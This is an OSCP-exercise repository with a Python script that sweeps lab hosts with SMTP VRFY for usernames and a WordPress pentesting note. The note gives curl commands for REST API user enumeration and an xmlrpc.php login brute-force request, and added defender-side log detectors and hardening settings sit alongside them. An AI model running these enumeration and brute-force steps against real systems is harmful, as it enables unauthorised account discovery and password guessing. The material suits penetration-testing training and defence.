├── README.md
├── Wordpress.md
└── snmp_user_discovery.py
/README.md:
--------------------------------------------------------------------------------
# oscp-scripts
Scripts created for use with the OSCP exercises

## snmp_user_discovery.py
*Requires python2*

Use this script to check a list of IP addresses for a list of usernames. For every host it connects to TCP port 25 and issues an SMTP `VRFY <username>` for each name; despite the file name it speaks SMTP, not SNMP. A "successful connection" line means the host accepted the connection and answered the VRFY; the script does not inspect the SMTP reply code, so on its own that line does not confirm that the account exists.

### Example usage
```
# ./snmp_user_discovery.py users.txt ips.txt
['root', 'admin', 'administrator', 'webadmin', 'sysadmin', 'netadmin', 'guest', 'user', 'web', 'test', 'jenny', 'joe45', 'john', 'marcus', 'ryuu']
['10.11.1.227', '10.11.1.72', '10.11.1.115', '10.11.1.217', '10.11.1.231', '10.11.1.241']
testing user root on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user root
testing user admin on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user admin
testing user administrator on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user administrator
testing user webadmin on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user webadmin
testing user sysadmin on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user sysadmin
testing user netadmin on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user netadmin
testing user guest on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user guest
testing user user on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user user
testing user web on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user web
testing user test on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user test
testing user jenny on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user jenny
testing user joe45 on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user joe45
testing user john on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user john
testing user marcus on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user marcus
testing user ryuu on ip 10.11.1.227
successful connection to ip 10.11.1.227 for user ryuu
```

### users.txt
```
root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
jenny
joe45
john
marcus
ryuu
```

### ips.txt
```
10.11.1.72
10.11.1.115
10.11.1.217
10.11.1.227
10.11.1.231
10.11.1.241
```

--------------------------------------------------------------------------------
/Wordpress.md:
--------------------------------------------------------------------------------
# Pentesting WordPress

## REST API User Enumeration

```
curl -k https://$DOMAIN/wp-json/wp/v2/users
curl -k https://$DOMAIN/wp-json/akismet/v1
curl -k https://$DOMAIN/wp-json
curl -k https://$DOMAIN/wp-json/wp/v2/pages
```

## Brute Force Login

### List all methods

```
curl -L \
-X POST \
-d ' system.listMethods ' \
https://$DOMAIN/xmlrpc.php
```

### POST Request
This is used for the brute force login. Replace $DOMAIN with the domain you are attacking. Use Burp Suite Intruder to attack.

```
POST //xmlrpc.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 264
Host: $DOMAIN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Connection: Keep-alive

wp.getUsersBlogs
admin
894437894437534447

```

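An added example from the defender's side, not part of this repository: detection logic run over constructed Apache/nginx combined-format access log lines that flags the two activities described above, REST `wp-json/wp/v2/users` enumeration and a burst of POSTs to `xmlrpc.php` from one client. The IPs, timestamps and request lines are made up for the example, and the `//xmlrpc.php` form from the request above is normalised so it does not slip past an exact-path match.

```python
import re
from collections import Counter

# Constructed Apache/nginx "combined" log lines, not taken from a real server.
SAMPLE_ACCESS_LOG = """\
10.11.1.50 - - [01/May/2024:10:00:01 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812 "-" "curl/8.0"
10.11.1.50 - - [01/May/2024:10:00:10 +0000] "POST //xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
10.11.1.50 - - [01/May/2024:10:00:10 +0000] "POST //xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
10.11.1.50 - - [01/May/2024:10:00:11 +0000] "POST //xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
10.11.1.50 - - [01/May/2024:10:00:11 +0000] "POST //xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
10.11.1.50 - - [01/May/2024:10:00:12 +0000] "POST //xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
10.11.1.9 - - [01/May/2024:10:03:00 +0000] "GET /wp-json/wp/v2/pages HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
10.11.1.9 - - [01/May/2024:10:03:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WordPress/6.5; pingback"
"""

# client ip, method, path and status from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def normalise_path(raw_path):
    # Drop the query string and collapse leading slashes, so the "//xmlrpc.php"
    # form used in the request above hits the same rule as "/xmlrpc.php".
    return "/" + raw_path.split("?", 1)[0].lstrip("/")


def detect_wp_probes(log_text, xmlrpc_post_threshold=5):
    """Return [(client_ip, finding), ...] for REST user enumeration and for
    POST bursts against xmlrpc.php; a failed wp.getUsersBlogs login is still
    HTTP 200, so volume per client, not status code, is the signal."""
    findings = []
    xmlrpc_posts = Counter()
    enumerators = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting
        ip, method, raw_path, _status = m.groups()
        path = normalise_path(raw_path)
        if path.startswith("/wp-json/wp/v2/users") and ip not in enumerators:
            enumerators.add(ip)
            findings.append((ip, "REST API user enumeration"))
        if method == "POST" and path == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1
    for ip, n in sorted(xmlrpc_posts.items()):
        if n >= xmlrpc_post_threshold:
            findings.append((ip, "xmlrpc.php POST burst ({} requests)".format(n)))
    return findings
```

Where pingbacks and remote publishing are not needed, the `xmlrpc_enabled` filter (`add_filter('xmlrpc_enabled', '__return_false');`) removes the brute-force surface entirely; the threshold exists because a single legitimate pingback POST, like the last sample line, is normal traffic.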
--------------------------------------------------------------------------------
/snmp_user_discovery.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# snmp_user_discovery.py
# For every host in the IP list, connect to TCP/25 and issue an SMTP VRFY for
# every name in the user list (despite the file name this speaks SMTP, not SNMP).
import socket
import sys

if len(sys.argv) != 3:
    print("Usage: snmp_user_discovery.py <users_file> <ips_file>")
    sys.exit(0)


def gen_user_list(users):
    # One username per line; drop the trailing newline.
    users_list = []
    with open(users, "r") as file:
        for user in file:
            users_list.append(user.strip("\n"))
    return users_list


def gen_rhost_list(rhosts):
    # One target IP per line; drop the trailing newline.
    rhosts_list = []
    with open(rhosts, "r") as file:
        for host in file:
            rhosts_list.append(host.strip("\n"))
    return rhosts_list


def send_verify(ip, user):
    # Connect, read the banner, send "VRFY <user>" and read the reply.
    # "successful connection" means the host answered; the SMTP reply code in
    # `result` is received but not interpreted.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    print("testing user {} on ip {}".format(user, ip))
    try:
        s.connect((ip, 25))
        banner = s.recv(1024)
        data = b'VRFY ' + user.encode() + b'\r\n'
        s.send(data)
        result = s.recv(1024)
        print("successful connection to ip {} for user {}".format(ip, user))
        return user
    except Exception:
        return False
    finally:
        # The original placed close() after the return, where it never ran.
        s.close()


def main():
    users_file = sys.argv[1]
    hosts_file = sys.argv[2]
    rhosts = gen_rhost_list(hosts_file)
    users = gen_user_list(users_file)
    print(users)
    print(rhosts)

    for ip in rhosts:
        for user in users:
            send_verify(ip, user)


if __name__ == "__main__":
    main()

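An added example from the defender's side, not part of this repository: detection logic run over constructed SMTP command log lines that flags a client issuing VRFY for many distinct usernames inside a short window, which is exactly the traffic the script above produces. The log format (one line per command: timestamp, client IP, command, argument, reply code), the IPs and the timestamps are all made up for the example and are not any real MTA's log format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log, not the output of any real MTA: one line per SMTP
# command as "<ISO timestamp> <client ip> <command> <argument> <reply code>".
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.11.1.50 HELO scanner 250
2024-05-01T10:00:01 10.11.1.50 VRFY root 252
2024-05-01T10:00:02 10.11.1.50 VRFY admin 252
2024-05-01T10:00:02 10.11.1.50 VRFY administrator 252
2024-05-01T10:00:03 10.11.1.50 VRFY webadmin 550
2024-05-01T10:00:03 10.11.1.50 VRFY sysadmin 550
2024-05-01T10:00:04 10.11.1.50 VRFY guest 252
2024-05-01T10:05:00 10.11.1.9 VRFY postmaster 252
2024-05-01T10:06:00 10.11.1.9 MAIL FROM:<a@example.org> 250
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def detect_vrfy_sweeps(log_text, window_seconds=60, min_distinct_users=5):
    """Return {client_ip: sorted usernames} for every client that issued VRFY
    for at least min_distinct_users different names inside window_seconds."""
    events = defaultdict(list)  # client ip -> [(timestamp, username), ...]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        ts, ip, cmd, arg, _code = m.groups()
        # A sweep is visible whether the server answers 250, 252 or 550.
        if cmd.upper() == "VRFY":
            events[ip].append((datetime.fromisoformat(ts), arg.lower()))

    window = timedelta(seconds=window_seconds)
    flagged = defaultdict(set)
    for ip, evs in events.items():
        evs.sort()
        recent = deque()  # VRFY events inside the sliding window
        for ts, user in evs:
            recent.append((ts, user))
            while ts - recent[0][0] > window:
                recent.popleft()
            distinct = {u for _, u in recent}
            if len(distinct) >= min_distinct_users:
                flagged[ip].update(distinct)
    return {ip: sorted(users) for ip, users in flagged.items()}
```

The script above prints "successful connection" whether the server answers 252 or 550, and this detector likewise ignores the reply code: the sweep itself is the signal. Postfix can refuse the command outright with `disable_vrfy_command = yes` in main.cf.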
--------------------------------------------------------------------------------